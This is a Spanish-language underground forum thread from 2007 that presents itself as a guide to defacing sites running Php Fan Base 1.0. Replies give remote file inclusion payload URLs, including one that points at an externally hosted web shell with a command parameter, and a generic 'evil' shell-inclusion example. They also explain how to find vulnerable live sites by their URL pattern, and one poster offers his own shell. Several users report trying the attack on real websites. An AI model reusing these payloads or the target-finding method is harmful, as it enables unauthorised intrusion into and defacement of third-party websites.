Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 20, 2008, 11:28:34
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer  (Leído 693 veces)
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« en: Febrero 20, 2007, 08:50:41 »
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
OzX
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #1 en: Febrero 21, 2007, 03:38:52 »
RFI , remote file inclucion Cheesy

Código:
protection.php?action=logout&siteurl=MISHELL
creo que el problema radica en el $include () protection, que llama cuando uno se sale del sitio o no?
En línea

http://foro.new-bytes.net
'Oryon'
Miembro
*****
Desconectado Desconectado

Mensajes: 22


"El conocimiento es el poder"

darkmotives1.0@hotmail.com // //
Ver Perfil
« Respuesta #2 en: Febrero 21, 2007, 06:53:42 »
En línea
"Permanecer en lo conocido por miedo a lo desconocido, equivale a mantenerce con vida pero no vivir". --- Oryon---
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #3 en: Febrero 22, 2007, 01:40:24 »
Cita de: OzX [NuKe] en Febrero 21, 2007, 03:38:52
RFI , remote file inclucion Cheesy

Código:
protection.php?action=logout&siteurl=MISHELL
creo que el problema radica en el $include () protection, que llama cuando uno se sale del sitio o no?


 Claro... es RFI y el problema esta en que no definen la variable protection... de esa forma se puede entrar con la shell pero ademas no esta bien configurada la parte de logeo entonces la salto con un codigo cortito en el cual como vos decis indica si entras o salis del sitio.

Por lo que pregunto el otro user no recuerdo su nombre xD jejeje... mira al hacer rfi puedes usar cualquier shell pero es dificil crear una propia... tienes que tener muchos conocimientos por eso es mejor usa las de otros... por eso te ofresco la mia amigo  Cheesy

 Pr0gr4mer
Pr0gr4mer
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
'Oryon'
Miembro
*****
Desconectado Desconectado

Mensajes: 22


"El conocimiento es el poder"

darkmotives1.0@hotmail.com // //
Ver Perfil
« Respuesta #4 en: Febrero 22, 2007, 03:20:27 »
:)Que tal, preguntaba lo de como crearme una shell porque me parece un abuso que alguien llegue como si nada y se valga de algo que no le pertenece. Pero ya que me ofreces la tuya bueno, gracias, aprecio tu generosidad y en vista de que si se puede revisar otra web con esta shell, entonces me pondre a intentar a ver que resultado obtengo. 

Saludos.
En línea
"Permanecer en lo conocido por miedo a lo desconocido, equivale a mantenerce con vida pero no vivir". --- Oryon---
'Oryon'
Miembro
*****
Desconectado Desconectado

Mensajes: 22


"El conocimiento es el poder"

darkmotives1.0@hotmail.com // //
Ver Perfil
« Respuesta #5 en: Febrero 22, 2007, 04:25:14 »
En línea
"Permanecer en lo conocido por miedo a lo desconocido, equivale a mantenerce con vida pero no vivir". --- Oryon---
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #6 en: Febrero 22, 2007, 09:27:44 »
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
'Oryon'
Miembro
*****
Desconectado Desconectado

Mensajes: 22


"El conocimiento es el poder"

darkmotives1.0@hotmail.com // //
Ver Perfil
« Respuesta #7 en: Febrero 22, 2007, 10:49:37 »
En línea
"Permanecer en lo conocido por miedo a lo desconocido, equivale a mantenerce con vida pero no vivir". --- Oryon---
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #8 en: Febrero 23, 2007, 05:45:34 »
 Es facil... mira....

 En la guia que hice yo la vulnerabilidad se encuentra en la variable protection... y en lo que vos me mostras: http://target/path/function.php?gbpfad=http://evil[script] el bug esta en la variable fuction entonces lo q haces es... una ves que encontras una web cuya terminacion sea www.laweb.com/elindex/fuction.php?gbpfad=TUSHELL listo.... ya podes joder a la web o darte la cabeza contra el monitor al ver que no tiene permisos de escritura Cheesy

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
'Oryon'
Miembro
*****
Desconectado Desconectado

Mensajes: 22


"El conocimiento es el poder"

darkmotives1.0@hotmail.com // //
Ver Perfil
« Respuesta #9 en: Marzo 02, 2007, 06:35:00 »
En línea
"Permanecer en lo conocido por miedo a lo desconocido, equivale a mantenerce con vida pero no vivir". --- Oryon---
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #10 en: Marzo 03, 2007, 05:31:56 »
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
-Blink-
Colaborador
*****
Desconectado Desconectado

Mensajes: 596


!VivaChileMierda!


Ver Perfil WWW
« Respuesta #11 en: Marzo 03, 2007, 06:13:29 »
Wenas
Estube leyendo y me parecio interesante asiq empese a probar peor la mayoria de las paginas a las que entro al ponerles
"/protection.php?action=logout&siteurl=http://www.usuarios.lycos.es/hackercito15/cmd/tool25.doc?&list=1&cmd=ls"
me llevan al Index de la pagina, estonses Estoy haciendo algo mal yo o es porque la pagina no es vulnerable?
Quiero asegurarme altiro para no perder tiempo

Salu2!

PD: Buena guia!
En línea
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #12 en: Marzo 05, 2007, 02:16:02 »
Cita de: -Blink- en Marzo 03, 2007, 06:13:29
Wenas
Estube leyendo y me parecio interesante asiq empese a probar peor la mayoria de las paginas a las que entro al ponerles
"/protection.php?action=logout&siteurl=http://www.usuarios.lycos.es/hackercito15/cmd/tool25.doc?&list=1&cmd=ls"
me llevan al Index de la pagina, estonses Estoy haciendo algo mal yo o es porque la pagina no es vulnerable?
Quiero asegurarme altiro para no perder tiempo

Salu2!

PD: Buena guia!

 Las webs q seguramente son vulnerables por lo menos a la shell (despues se ve si tiene o no permisos) tienen al final members.php?id=all entonces tu borras esa parte y copias la de protection... me comprendes??? si te redirecciona al index no es q estas haciendo algo mal si no que la web no tiene fallos, o bien la variable esta definida y no te deja entrar via shell.

 Pr0gr4mer
 
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
-Blink-
Colaborador
*****
Desconectado Desconectado

Mensajes: 596


!VivaChileMierda!


Ver Perfil WWW
« Respuesta #13 en: Marzo 05, 2007, 02:42:16 »
Ok. Muchas grasias necesitava aclararme esa duda
Lo mas problable era que no sean vulnerables porque ahora que lo miro sale "powered phpfanbase 2.0" en la parte de abajo

Salu2!
En línea
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #14 en: Marzo 06, 2007, 12:32:50 »
Cita de: -Blink- en Marzo 05, 2007, 02:42:16
Ok. Muchas grasias necesitava aclararme esa duda
Lo mas problable era que no sean vulnerables porque ahora que lo miro sale "powered phpfanbase 2.0" en la parte de abajo

Salu2!

 Si pero no te guies por eso... aveces las 2.0 tambien son vulnerables, obviamente no todas!.

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
'Oryon'
Miembro
*****
Desconectado Desconectado

Mensajes: 22


"El conocimiento es el poder"

darkmotives1.0@hotmail.com // //
Ver Perfil
« Respuesta #15 en: Marzo 06, 2007, 02:23:39 »
En línea
"Permanecer en lo conocido por miedo a lo desconocido, equivale a mantenerce con vida pero no vivir". --- Oryon---
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC